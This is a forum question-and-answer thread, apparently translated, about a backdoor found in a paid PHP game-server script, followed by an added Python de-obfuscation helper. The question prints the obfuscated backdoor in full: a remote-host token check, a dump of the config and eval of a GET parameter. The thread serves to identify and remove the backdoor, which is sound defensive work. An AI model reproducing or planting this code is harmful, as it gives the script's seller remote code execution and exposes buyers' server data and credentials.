Malicious code in PHP script, how to remove?

The hosting provider reported that the script has malware!

${"GLOBALS"}["zhnlnvpxiov"] = "config";
${"GLOBALS"}["rchmyoafpzb"] = "oloki";
if (!empty($_GET["doConfirmLoki"])) {
    ${"GLOBALS"}["hypqdo"] = "cloki";
    ${"GLOBALS"}["zbgjvvsxd"] = "cloki";
    ${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
    $bqhzcuynfrb = "cloki";
    ${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
    ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
    if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
        echo '<pre>';
        print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
        echo '</pre>';
        if (isset($_GET["uloki"])) eval($_GET["uloki"]);
    }
    die;
}

So as not to name the third-party website, I used the characters xxxxx. What would this mean?
{VIRUSDIE}Eval.request
{VIRUSDIE}Obfuscated.Globals.Names
I can even name who is selling the script with this functionality! And the person who sells the license for this script says the following:
Me: That is, for violating your rules, you ruin the project for your client that way?
The owner of the script: Each case is unique...

Is this code dangerous and what does it do? And how to deal with those who distribute this script and still charge for it?

Every PHP file in this script has the following: if (!defined("TKM")) die("Access denied!");
April 7th 20 at 15:19
2 answers
April 7th 20 at 15:21
Search all files for the substring ${"GLOBALS"}[" and remove everything from there up to the lines:
if (isset($_GET["uloki"])) eval($_GET["uloki"]);
}
die;
 }
inclusive!
@georgiana86, https://www.php.net/manual/ru/function.defined - alden.Herzog commented on April 7th 20 at 15:27
@georgiana86, I can assume it is so that the file is not called directly from the browser.
In this case I do not see any danger in this code; many software developers protect their code this way. - vinnie53 commented on April 7th 20 at 15:30
About the function:
if (!defined("TKM")) die("Access denied!");

in each PHP file, what does that mean? - jasmin_Jaco commented on April 7th 20 at 15:24
@georgiana86, it is a check of the flag that prohibits direct calls. Web applications usually do this everywhere.
Leave it exactly as is and do not delete! - kailey_Erns commented on April 7th 20 at 15:33
April 7th 20 at 15:23
Even without parsing the code, just looking at this:
eval($_GET["uloki"])
we can assume that at some point any script can be called through a GET request. Quite a dangerous thing.
https://www.php.net/manual/ru/function.eval.php

And what's the problem with fixing it? Or was this code provided by the hosting? Searching all files for a certain piece of text should give some kind of result.
And the function ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb}); where xxxxx leads to an external site, what is it for? - jasmin_Jaco commented on April 7th 20 at 15:26
@georgiana86, the full domain name.
The author of the script, preferably, too - vinnie53 commented on April 7th 20 at 15:29
@shanelle55,
${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("https://whileteam.ru/ad-loki.php?loki=" . ${$bqhzcuynfrb});


I think no comment is needed here. Please, a huge request, I don't shoot the author, anonymously, I'm just worried about those who bought the script and are still not aware that all the data of their game servers, configs, database, etc. is freely available to him...

Not only that, for the script he took a ready-made rcon which is freely available on Git, and he also took https://github.com/AlexBrin/LiteDonate-PHP-SDK and not just securely added the payment function to run the script after payment...

So he dictates his policy of "License." https://ldonate.ru/info/license - jasmin_Jaco commented on April 7th 20 at 15:32
@georgiana86, again, as an assumption, it looks like some sort of ad integration. That is the best case. In the worst case, up to access to the server, because eval can execute any PHP script. Especially if the file where this code is written has all the permissions. - vinnie53 commented on April 7th 20 at 15:35
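
An added example, not part of the original thread or of the script being discussed: a small Python triage helper that resolves the ${"GLOBALS"}[...] indirection in the snippet from the question so the real variable names become readable, and flags the two patterns the hosting scanner reported. The function names and the embedded sample (with the xxxxx placeholder kept) are constructed for illustration.

```python
import re

# Constructed sample: the snippet from the question, xxxxx placeholder kept as posted.
SAMPLE = r'''${"GLOBALS"}["zhnlnvpxiov"] = "config";
${"GLOBALS"}["rchmyoafpzb"] = "oloki";
if (!empty($_GET["doConfirmLoki"])) {
${"GLOBALS"}["hypqdo"] = "cloki";
${"GLOBALS"}["zbgjvvsxd"] = "cloki";
${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
$bqhzcuynfrb = "cloki";
${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
echo '<pre>';
print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
echo '</pre>';
if (isset($_GET["uloki"])) eval($_GET["uloki"]);
}
die;
}'''

G_ASSIGN = re.compile(r'\$\{"GLOBALS"\}\["(\w+)"\]\s*=\s*"(\w+)";')  # alias table entry
S_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"(\w+)";')                      # $x = "name";
G_USE = re.compile(r'\$\{\$\{"GLOBALS"\}\["(\w+)"\]\}')               # ${${"GLOBALS"}["k"]}
S_USE = re.compile(r'\$\{\$(\w+)\}')                                  # ${$x}
REQ_EVAL = re.compile(r'\beval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b')

def deobfuscate(src):
    """Replace variable-variable lookups with the names they resolve to."""
    g, s = dict(G_ASSIGN.findall(src)), dict(S_ASSIGN.findall(src))
    out = G_USE.sub(lambda m: "$" + g[m.group(1)] if m.group(1) in g else m.group(0), src)
    out = S_USE.sub(lambda m: "$" + s[m.group(1)] if m.group(1) in s else m.group(0), out)
    # Drop the alias-table lines; every other line is kept for review.
    return "\n".join(l for l in out.splitlines() if not G_ASSIGN.fullmatch(l.strip()))

def findings(src):
    """Indicators corresponding to the two scanner verdicts quoted in the question."""
    hits = []
    if G_ASSIGN.search(src):
        hits.append("obfuscated GLOBALS names")
    if REQ_EVAL.search(src):
        hits.append("eval on request input")
    return hits

if __name__ == "__main__":
    print(findings(SAMPLE))
    print(deobfuscate(SAMPLE))
```

Run over the sample, the output shows that $config is printed and the uloki parameter is evaluated once the remote response equals the doConfirmLoki value; the plain if (!defined("TKM")) guard line produces no findings.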
